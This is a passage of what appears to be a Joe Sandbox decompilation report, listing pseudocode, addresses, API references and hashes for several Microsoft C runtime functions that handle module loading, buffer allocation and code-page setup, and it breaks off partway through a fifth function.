C-Code - Quality: 100%

			E013B685D(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t13;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x13d9888 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x13c4358 + _t22 * 4);
						_t13 = LoadLibraryExW(_t23, 0, 0x800); // executed
						_t32 = _t13;
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E013B6698(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E013B6698(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x013b6866
0x013b6910
0x013b686e
0x013b6870
0x013b6877
0x013b6879
0x013b687f
0x013b688c
0x013b689b
0x013b68a1
0x013b68a5
0x013b68f7
0x013b68f7
0x013b68fc
0x013b6900
0x013b6903
0x013b6903
0x013b6909
0x013b690b
0x013b6920
0x013b691b
0x013b691f
0x013b691f
0x013b690d
0x013b690d
0x00000000
0x013b690d
0x013b68a7
0x013b68b0
0x013b68e7
0x013b68e7
0x013b68e9
0x013b68eb
0x00000000
0x00000000
0x013b68f3
0x00000000
0x013b68f3
0x013b68ba
0x013b68bf
0x013b68c4
0x00000000
0x00000000
0x013b68ce
0x013b68d3
0x013b68d8
0x00000000
0x00000000
0x013b68dd
0x013b68e3
0x00000000
0x013b68e3
0x013b6884
0x00000000
0x00000000
0x00000000
0x013b688a
0x013b6919
0x00000000

Strings

api-ms-, xrefs: 013B68B4
ext-ms-, xrefs: 013B68C8

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 9e95aeaef271c41150d44d7553923e2d4fd373161c2987680bf0a87010647cb9
Instruction ID: 79a7043b372eba85cc041dc646158bf3cb1a9cb6aa7ea3fc2a317ffc497bde71
Opcode Fuzzy Hash: 9e95aeaef271c41150d44d7553923e2d4fd373161c2987680bf0a87010647cb9
Instruction Fuzzy Hash: 5821C9F1A01225ABDB315A299CC6BDE7B5CAF41B68F150524EF56E7A83F630E900C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 013BEAA4 Relevance: 7.7, APIs: 5, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E013BEAA4(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				signed int _t49;
				void* _t51;
				void* _t53;
				signed int _t55;
				intOrPtr _t63;
				intOrPtr _t69;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr _t86;
				void* _t89;
				intOrPtr* _t91;
				intOrPtr _t93;
				void* _t94;
				void* _t95;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0x13ca014; // 0xfcb69da6
				_v8 = _t41 ^ _t96;
				_t93 = _a20;
				if(_t93 > 0) {
					_t69 = E013BFF1F(_a16, _t93);
					_t103 = _t69 - _t93;
					_t4 = _t69 + 1; // 0x1
					_t93 = _t4;
					if(_t103 >= 0) {
						_t93 = _t69;
					}
				}
				_t88 = _a32;
				if(_a32 == 0) {
					_t88 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t86 = E013B9CD6(_t88, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t93, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t86;
				if(_t86 == 0) {
					L39:
					_pop(_t89);
					_pop(_t94);
					_pop(_t71);
					return E013B1EDB(_t46, _t71, _v8 ^ _t96, _t86, _t89, _t94);
				} else {
					_t17 = _t86 + _t86 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t86 + _t86 & _t17;
					if(_t49 == 0) {
						_t72 = 0;
						L15:
						if(_t72 == 0) {
							L37:
							_t95 = 0;
							L38:
							E013BA94C(_t72);
							_t46 = _t95;
							goto L39;
						}
						_t51 = E013B9CD6(_t88, 1, _a16, _t93, _t72, _t86);
						_t100 = _t98 + 0x18;
						if(_t51 == 0) {
							goto L37;
						}
						_t90 = _v12;
						_t53 = E013B6BAD(_a8, _a12, _t72, _v12, 0, 0, 0, 0, 0); // executed
						_t95 = _t53;
						if(_t95 == 0) {
							goto L37;
						}
						_t86 = 0x400;
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t95 + _t95 + 8; // 0x8
							asm("sbb eax, eax");
							_t55 = _t95 + _t95 & _t31;
							if(_t55 == 0) {
								_t91 = 0;
								L31:
								if(_t91 == 0 || E013B6BAD(_a8, _a12, _t72, _v12, _t91, _t95, 0, 0, 0) == 0) {
									L36:
									E013BA94C(_t91);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t95);
									_push(_t91);
									_push(0);
									_push(_a32);
									_t95 = E013B9D52();
									if(_t95 != 0) {
										E013BA94C(_t91);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t55 > 0x400) {
								_t91 = E013B7210(_t55);
								if(_t91 == 0) {
									goto L36;
								}
								 *_t91 = 0xdddd;
								L29:
								_t91 = _t91 + 8;
								goto L31;
							}
							E013C1ED0(_t55);
							_t91 = _t100;
							if(_t91 == 0) {
								goto L36;
							}
							 *_t91 = 0xcccc;
							goto L29;
						}
						_t63 = _a28;
						if(_t63 == 0) {
							goto L38;
						}
						if(_t95 > _t63) {
							goto L37;
						}
						_t95 = E013B6BAD(_a8, _a12, _t72, _t90, _a24, _t63, 0, 0, 0);
						if(_t95 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t49 > 0x400) {
						_t72 = E013B7210(_t49);
						if(_t72 == 0) {
							L13:
							_t86 = _v12;
							goto L15;
						}
						 *_t72 = 0xdddd;
						L12:
						_t72 = _t72 + 8;
						goto L13;
					}
					E013C1ED0(_t49);
					_t72 = _t98;
					if(_t72 == 0) {
						goto L13;
					}
					 *_t72 = 0xcccc;
					goto L12;
				}
			}

0x013beaa9
0x013beaaa
0x013beaab
0x013beab2
0x013beab7
0x013beabd
0x013beac3
0x013beac9
0x013beacc
0x013beacc
0x013beacf
0x013bead1
0x013bead1
0x013beacf
0x013bead3
0x013bead8
0x013beadf
0x013beae2
0x013beae2
0x013beb03
0x013beb05
0x013beb08
0x013beb0d
0x013bec6b
0x013bec6e
0x013bec6f
0x013bec70
0x013bec7c
0x013beb13
0x013beb16
0x013beb1b
0x013beb1d
0x013beb1f
0x013beb56
0x013beb58
0x013beb5a
0x013bec60
0x013bec60
0x013bec62
0x013bec63
0x013bec69
0x00000000
0x013bec69
0x013beb69
0x013beb6e
0x013beb73
0x00000000
0x00000000
0x013beb79
0x013beb8b
0x013beb90
0x013beb94
0x00000000
0x00000000
0x013beb9a
0x013beba2
0x013bebdf
0x013bebe4
0x013bebe6
0x013bebe8
0x013bec19
0x013bec1b
0x013bec1d
0x013bec59
0x013bec5a
0x00000000
0x013bec3a
0x013bec3c
0x013bec3d
0x013bec41
0x013bec7d
0x013bec80
0x013bec43
0x013bec43
0x013bec44
0x013bec44
0x013bec45
0x013bec46
0x013bec47
0x013bec48
0x013bec50
0x013bec57
0x013bec86
0x00000000
0x00000000
0x00000000
0x00000000
0x013bec57
0x013bec1d
0x013bebec
0x013bec07
0x013bec0c
0x00000000
0x00000000
0x013bec0e
0x013bec14
0x013bec14
0x00000000
0x013bec14
0x013bebee
0x013bebf3
0x013bebf7
0x00000000
0x00000000
0x013bebf9
0x00000000
0x013bebf9
0x013beba4
0x013beba9
0x00000000
0x00000000
0x013bebb1
0x00000000
0x00000000
0x013bebcd
0x013bebd1
0x00000000
0x00000000
0x00000000
0x013bebd7
0x013beb26
0x013beb41
0x013beb46
0x013beb51
0x013beb51
0x00000000
0x013beb51
0x013beb48
0x013beb4e
0x013beb4e
0x00000000
0x013beb4e
0x013beb28
0x013beb2d
0x013beb31
0x00000000
0x00000000
0x013beb33
0x00000000
0x013beb33

APIs

__alloca_probe_16.LIBCMT ref: 013BEB28
__alloca_probe_16.LIBCMT ref: 013BEBEE
__freea.LIBCMT ref: 013BEC5A

Part of subcall function 013B7210: HeapAlloc.KERNEL32(00000000,013B63B0,013B63B0,?,013B9821,00000220,?,013B63B0,?,?,?,?,013B63B0,013B729E,?,?), ref: 013B7242

__freea.LIBCMT ref: 013BEC63
__freea.LIBCMT ref: 013BEC86

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: d67bfc41eec5c711e388828ecffbed053b7b79482772da151eab2bf1664abedc
Instruction ID: e4ad54ae6df68e503bc9d6da0fcf172a964ec87c2db8a092bef5e95d1e55a0cc
Opcode Fuzzy Hash: d67bfc41eec5c711e388828ecffbed053b7b79482772da151eab2bf1664abedc
Instruction Fuzzy Hash: FA51C27260020AAFEF259E6CCCC1EEB3AA9EF84758F150139FF15A7940F671DC0086A0

Uniqueness

Uniqueness Score: -1.00%

Function 013B9664 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E013B9664(void* __edx, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t60;
				signed int _t63;
				char _t68;
				signed char _t69;
				signed int _t70;
				signed int _t80;
				signed int _t81;
				char _t82;
				signed int _t85;
				signed char _t86;
				signed int _t87;
				signed int _t89;
				void* _t90;
				intOrPtr _t91;
				signed int _t92;

				_t60 =  *0x13ca014; // 0xfcb69da6
				_v8 = _t60 ^ _t92;
				_t91 = _a4;
				if( *(_t91 + 4) == 0xfde9) {
					L19:
					_t81 = 0;
					__eflags = 0;
					_t90 = 0x100;
					_t82 = 0;
					do {
						_t46 = _t82 - 0x61; // -97
						_t89 = _t46;
						_t47 = _t89 + 0x20; // -65
						__eflags = _t47 - 0x19;
						if(_t47 > 0x19) {
							__eflags = _t89 - 0x19;
							if(_t89 > 0x19) {
								_t63 = _t81;
							} else {
								 *(_t91 + _t82 + 0x19) =  *(_t91 + _t82 + 0x19) | 0x00000020;
								_t56 = _t82 - 0x20; // -32
								_t63 = _t56;
							}
						} else {
							 *(_t91 + _t82 + 0x19) =  *(_t91 + _t82 + 0x19) | 0x00000010;
							_t52 = _t82 + 0x20; // 0x20
							_t63 = _t52;
						}
						 *(_t91 + _t82 + 0x119) = _t63;
						_t82 = _t82 + 1;
						__eflags = _t82 - _t90;
					} while (_t82 < _t90);
					L26:
					return E013B1EDB(_t63, _t81, _v8 ^ _t92, _t89, _t90, _t91);
				}
				_t5 = _t91 + 4; // 0xe8458d00
				if(GetCPInfo( *_t5,  &_v1820) == 0) {
					goto L19;
				} else {
					_t81 = 0;
					_t90 = 0x100;
					_t68 = 0;
					do {
						 *((char*)(_t92 + _t68 - 0x104)) = _t68;
						_t68 = _t68 + 1;
					} while (_t68 < 0x100);
					_t69 = _v1814;
					_t85 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t100 = _t69;
						if(_t69 == 0) {
							break;
						}
						_t89 =  *(_t85 + 1) & 0x000000ff;
						_t70 = _t69 & 0x000000ff;
						while(1) {
							__eflags = _t70 - _t89;
							if(_t70 > _t89) {
								break;
							}
							__eflags = _t70 - _t90;
							if(_t70 >= _t90) {
								break;
							}
							 *((char*)(_t92 + _t70 - 0x104)) = 0x20;
							_t70 = _t70 + 1;
							__eflags = _t70;
						}
						_t85 = _t85 + 2;
						__eflags = _t85;
						_t69 =  *_t85;
					}
					_t14 = _t91 + 4; // 0xe8458d00
					E013BA849(_t89, _t100, _t81, 1,  &_v264, _t90,  &_v1800,  *_t14, _t81);
					_t17 = _t91 + 4; // 0xe8458d00
					_t20 = _t91 + 0x21c; // 0x42d23303
					E013BEC8E(_t100, _t81,  *_t20, _t90,  &_v264, _t90,  &_v520, _t90,  *_t17, _t81); // executed
					_t22 = _t91 + 4; // 0xe8458d00
					_t24 = _t91 + 0x21c; // 0x42d23303
					E013BEC8E(_t100, _t81,  *_t24, 0x200,  &_v264, _t90,  &_v776, _t90,  *_t22, _t81);
					_t80 = _t81;
					do {
						_t86 =  *(_t92 + _t80 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								_t87 = _t81;
							} else {
								 *(_t91 + _t80 + 0x19) =  *(_t91 + _t80 + 0x19) | 0x00000020;
								_t87 =  *((intOrPtr*)(_t92 + _t80 - 0x304));
							}
						} else {
							 *(_t91 + _t80 + 0x19) =  *(_t91 + _t80 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t92 + _t80 - 0x204));
						}
						 *(_t91 + _t80 + 0x119) = _t87;
						_t80 = _t80 + 1;
					} while (_t80 < _t90);
					goto L26;
				}
			}

0x013b966f
0x013b9676
0x013b967b
0x013b9686
0x013b9798
0x013b9798
0x013b9798
0x013b979a
0x013b979f
0x013b97a1
0x013b97a1
0x013b97a1
0x013b97a4
0x013b97a7
0x013b97aa
0x013b97b6
0x013b97b9
0x013b97c7
0x013b97bb
0x013b97be
0x013b97c2
0x013b97c2
0x013b97c2
0x013b97ac
0x013b97ac
0x013b97b1
0x013b97b1
0x013b97b1
0x013b97c9
0x013b97d0
0x013b97d1
0x013b97d1
0x013b97d5
0x013b97e3
0x013b97e3
0x013b9693
0x013b969e
0x00000000
0x013b96a4
0x013b96a4
0x013b96a6
0x013b96ab
0x013b96ad
0x013b96ad
0x013b96b4
0x013b96b5
0x013b96b9
0x013b96bf
0x013b96c5
0x013b96ed
0x013b96ed
0x013b96ef
0x00000000
0x00000000
0x013b96ce
0x013b96d2
0x013b96e4
0x013b96e4
0x013b96e6
0x00000000
0x00000000
0x013b96d7
0x013b96d9
0x00000000
0x00000000
0x013b96db
0x013b96e3
0x013b96e3
0x013b96e3
0x013b96e8
0x013b96e8
0x013b96eb
0x013b96eb
0x013b96f2
0x013b9707
0x013b970d
0x013b9721
0x013b9728
0x013b9737
0x013b9749
0x013b9750
0x013b9758
0x013b975a
0x013b975a
0x013b9765
0x013b9775
0x013b9778
0x013b9788
0x013b977a
0x013b977a
0x013b977f
0x013b977f
0x013b9767
0x013b9767
0x013b976c
0x013b976c
0x013b978a
0x013b9791
0x013b9792
0x00000000
0x013b9796

APIs

GetCPInfo.KERNEL32(E8458D00,?,?,?,00000000), ref: 013B9696

Strings

, xrefs: 013B96DB

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 96bbb7ed1ad5ad64cb4bcdb280bcf9fcc23181e252ec7900a1a0aa0a69ad7ba0
Instruction ID: ec0aea77ad5ec542b4ed50b9f2bf9954b7190a7668373ce5d7932cdebfea907f
Opcode Fuzzy Hash: 96bbb7ed1ad5ad64cb4bcdb280bcf9fcc23181e252ec7900a1a0aa0a69ad7ba0
Instruction Fuzzy Hash: 9F4127B010425C9FEB218F288CD4BFA7BFDAB5570CF1404ADE78A87842E2359945CB20

Uniqueness

Uniqueness Score: -1.00%

Function 013B99F3 Relevance: 3.2, APIs: 2, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E013B99F3(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t51;
				signed int _t55;
				int _t57;
				signed int _t60;
				signed int _t61;
				short _t64;
				signed char _t66;
				signed int _t67;
				signed char* _t75;
				signed char* _t76;
				int _t78;
				signed int _t83;
				signed char* _t84;
				short* _t85;
				signed int _t86;
				signed char _t87;
				signed int _t88;
				void* _t89;
				signed int _t90;
				signed int _t91;
				short _t92;
				signed int _t93;
				intOrPtr _t95;
				signed int _t96;

				_t89 = __edx;
				_t51 =  *0x13ca014; // 0xfcb69da6
				_v8 = _t51 ^ _t96;
				_t95 = _a8;
				_t78 = E013B958E(__eflags, _a4);
				if(_t78 == 0) {
					L36:
					E013B95FF(_t95);
					goto L37;
				} else {
					_t92 = 0;
					_t83 = 0;
					_t57 = 0;
					_v32 = 0;
					while( *((intOrPtr*)(_t57 + 0x13ca630)) != _t78) {
						_t83 = _t83 + 1;
						_t57 = _t57 + 0x30;
						_v32 = _t83;
						if(_t57 < 0xf0) {
							continue;
						} else {
							if(_t78 == 0xfde8) {
								L22:
								_t55 = _t57 | 0xffffffff;
							} else {
								_t57 = IsValidCodePage(_t78 & 0x0000ffff);
								if(_t57 == 0) {
									goto L22;
								} else {
									if(_t78 != 0xfde9) {
										_t57 = GetCPInfo(_t78,  &_v28);
										__eflags = _t57;
										if(_t57 == 0) {
											__eflags =  *0x13d9b88 - _t92; // 0x0
											if(__eflags != 0) {
												goto L36;
											} else {
												goto L22;
											}
										} else {
											E013B2C30(_t92, _t95 + 0x18, _t92, 0x101);
											 *(_t95 + 4) = _t78;
											__eflags = _v28 - 2;
											 *((intOrPtr*)(_t95 + 0x21c)) = _t92;
											if(_v28 == 2) {
												__eflags = _v22;
												_t75 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t87 = _t75[1];
														__eflags = _t87;
														if(_t87 == 0) {
															goto L18;
														}
														_t90 = _t87 & 0x000000ff;
														_t88 =  *_t75 & 0x000000ff;
														while(1) {
															__eflags = _t88 - _t90;
															if(_t88 > _t90) {
																break;
															}
															 *(_t95 + _t88 + 0x19) =  *(_t95 + _t88 + 0x19) | 0x00000004;
															_t88 = _t88 + 1;
															__eflags = _t88;
														}
														_t75 =  &(_t75[2]);
														__eflags =  *_t75;
														if( *_t75 != 0) {
															continue;
														}
														goto L18;
													}
												}
												L18:
												_t76 = _t95 + 0x1a;
												_t86 = 0xfe;
												do {
													 *_t76 =  *_t76 | 0x00000008;
													_t76 =  &(_t76[1]);
													_t86 = _t86 - 1;
													__eflags = _t86;
												} while (_t86 != 0);
												 *((intOrPtr*)(_t95 + 0x21c)) = E013B9550( *(_t95 + 4));
												_t92 = 1;
											}
											goto L8;
										}
									} else {
										 *(_t95 + 4) = 0xfde9;
										 *((intOrPtr*)(_t95 + 0x21c)) = _t92;
										 *((intOrPtr*)(_t95 + 0x18)) = _t92;
										 *((short*)(_t95 + 0x1c)) = _t92;
										L8:
										 *((intOrPtr*)(_t95 + 8)) = _t92;
										_t92 = _t95 + 0xc;
										asm("stosd");
										asm("stosd");
										asm("stosd");
										L9:
										E013B9664(_t90, _t95); // executed
										L37:
										_t55 = 0;
									}
								}
							}
						}
						goto L38;
					}
					E013B2C30(_t92, _t95 + 0x18, _t92, 0x101);
					_t60 = _v32 * 0x30;
					__eflags = _t60;
					_v36 = _t60;
					_t61 = _t60 + 0x13ca640;
					_v32 = _t61;
					do {
						__eflags =  *_t61;
						_t84 = _t61;
						if( *_t61 != 0) {
							while(1) {
								_t66 = _t84[1];
								__eflags = _t66;
								if(_t66 == 0) {
									break;
								}
								_t91 =  *_t84 & 0x000000ff;
								_t67 = _t66 & 0x000000ff;
								while(1) {
									__eflags = _t91 - _t67;
									if(_t91 > _t67) {
										break;
									}
									__eflags = _t91 - 0x100;
									if(_t91 < 0x100) {
										_t34 = _t92 + 0x13ca628; // 0x8040201
										 *(_t95 + _t91 + 0x19) =  *(_t95 + _t91 + 0x19) |  *_t34;
										_t91 = _t91 + 1;
										__eflags = _t91;
										_t67 = _t84[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t84 =  &(_t84[2]);
								__eflags =  *_t84;
								if( *_t84 != 0) {
									continue;
								}
								break;
							}
							_t61 = _v32;
						}
						_t92 = _t92 + 1;
						_t61 = _t61 + 8;
						_v32 = _t61;
						__eflags = _t92 - 4;
					} while (_t92 < 4);
					 *(_t95 + 4) = _t78;
					 *((intOrPtr*)(_t95 + 8)) = 1;
					 *((intOrPtr*)(_t95 + 0x21c)) = E013B9550(_t78);
					_t85 = _t95 + 0xc;
					_t90 = _v36 + 0x13ca634;
					_t93 = 6;
					do {
						_t64 =  *_t90;
						_t90 = _t90 + 2;
						 *_t85 = _t64;
						_t85 = _t85 + 2;
						_t93 = _t93 - 1;
						__eflags = _t93;
					} while (_t93 != 0);
					goto L9;
				}
				L38:
				return E013B1EDB(_t55, _t78, _v8 ^ _t96, _t89, _t92, _t95);
			}

0x013b99f3
0x013b99fb
0x013b9a02
0x013b9a07
0x013b9a13
0x013b9a18
0x013b9bce
0x013b9bcf
0x00000000
0x013b9a1e
0x013b9a1e
0x013b9a20
0x013b9a22
0x013b9a24
0x013b9a27
0x013b9a33
0x013b9a34
0x013b9a37
0x013b9a3f
0x00000000
0x013b9a41
0x013b9a47
0x013b9b1e
0x013b9b1e
0x013b9a4d
0x013b9a51
0x013b9a59
0x00000000
0x013b9a5f
0x013b9a66
0x013b9a93
0x013b9a99
0x013b9a9b
0x013b9b12
0x013b9b18
0x00000000
0x00000000
0x00000000
0x00000000
0x013b9a9d
0x013b9aa7
0x013b9aaf
0x013b9ab2
0x013b9ab6
0x013b9abc
0x013b9abe
0x013b9ac2
0x013b9ac5
0x013b9ac7
0x013b9ac7
0x013b9aca
0x013b9acc
0x00000000
0x00000000
0x013b9ace
0x013b9ad1
0x013b9adc
0x013b9adc
0x013b9ade
0x00000000
0x00000000
0x013b9ad6
0x013b9adb
0x013b9adb
0x013b9adb
0x013b9ae0
0x013b9ae3
0x013b9ae6
0x00000000
0x00000000
0x00000000
0x013b9ae6
0x013b9ac7
0x013b9ae8
0x013b9ae8
0x013b9aeb
0x013b9af0
0x013b9af0
0x013b9af3
0x013b9af4
0x013b9af4
0x013b9af4
0x013b9b03
0x013b9b0c
0x013b9b0c
0x00000000
0x013b9abc
0x013b9a68
0x013b9a68
0x013b9a6b
0x013b9a71
0x013b9a74
0x013b9a78
0x013b9a78
0x013b9a7d
0x013b9a80
0x013b9a81
0x013b9a82
0x013b9a83
0x013b9a84
0x013b9bd4
0x013b9bd4
0x013b9bd6
0x013b9a66
0x013b9a59
0x013b9a47
0x00000000
0x013b9a3f
0x013b9b30
0x013b9b38
0x013b9b38
0x013b9b3c
0x013b9b3f
0x013b9b45
0x013b9b48
0x013b9b48
0x013b9b4b
0x013b9b4d
0x013b9b4f
0x013b9b4f
0x013b9b52
0x013b9b54
0x00000000
0x00000000
0x013b9b56
0x013b9b59
0x013b9b75
0x013b9b75
0x013b9b77
0x00000000
0x00000000
0x013b9b5e
0x013b9b64
0x013b9b66
0x013b9b6c
0x013b9b70
0x013b9b70
0x013b9b71
0x00000000
0x013b9b71
0x00000000
0x013b9b64
0x013b9b79
0x013b9b7c
0x013b9b7f
0x00000000
0x00000000
0x00000000
0x013b9b7f
0x013b9b81
0x013b9b81
0x013b9b84
0x013b9b85
0x013b9b88
0x013b9b8b
0x013b9b8b
0x013b9b91
0x013b9b94
0x013b9ba3
0x013b9bac
0x013b9bb1
0x013b9bb7
0x013b9bb8
0x013b9bb8
0x013b9bbb
0x013b9bbe
0x013b9bc1
0x013b9bc4
0x013b9bc4
0x013b9bc4
0x00000000
0x013b9bc9
0x013b9bd7
0x013b9be5

APIs

Part of subcall function 013B958E: GetOEMCP.KERNEL32(00000000,013B97FF,?,013B729E,013B63B0,013B63B0,013B729E,?,?), ref: 013B95B9

IsValidCodePage.KERNEL32(-00000030,00000000,8BFFFFC9,?,?,?,013B9846,?,00000000,?,013B63B0,?,?,?,?,013B63B0), ref: 013B9A51
GetCPInfo.KERNEL32(00000000,013B9846,?,?,013B9846,?,00000000,?,013B63B0,?,?,?,?,013B63B0,013B729E), ref: 013B9A93

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 3fa11c6422784495a939aec8aff50ebdd28f36bf6d274757e3e2027fde28fc5c
Instruction ID: 90186d8b48770a63220ddf1f82fd49beedc8bb3e4855897fb320186a83b0c825
Opcode Fuzzy Hash: 3fa11c6422784495a939aec8aff50ebdd28f36bf6d274757e3e2027fde28fc5c
Instruction Fuzzy Hash: 965124B0A002459EEB21CF69C8C07EABFF9EF9131CF18456EC39687A51F634A545CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013B97E4 Relevance: 3.1, APIs: 2, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E013B97E4(signed int __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, char _a12, void* _a16) {
				void* _v5;
				char _v12;
				char _v16;
				char* _v20;
				char _v24;
				void* __ebp;
				char _t37;
				signed int _t42;
				signed int _t46;
				char _t49;
				char _t56;
				signed int _t62;
				char _t65;
				void* _t73;
				void* _t79;
				signed int _t84;

				_t77 = __edx;
				_push(_a16);
				_push(_a12);
				E013B98F8(__ebx, __edx, __edi, __esi, __eflags);
				_t37 = E013B958E(__eflags, _a4);
				_t65 = _a12;
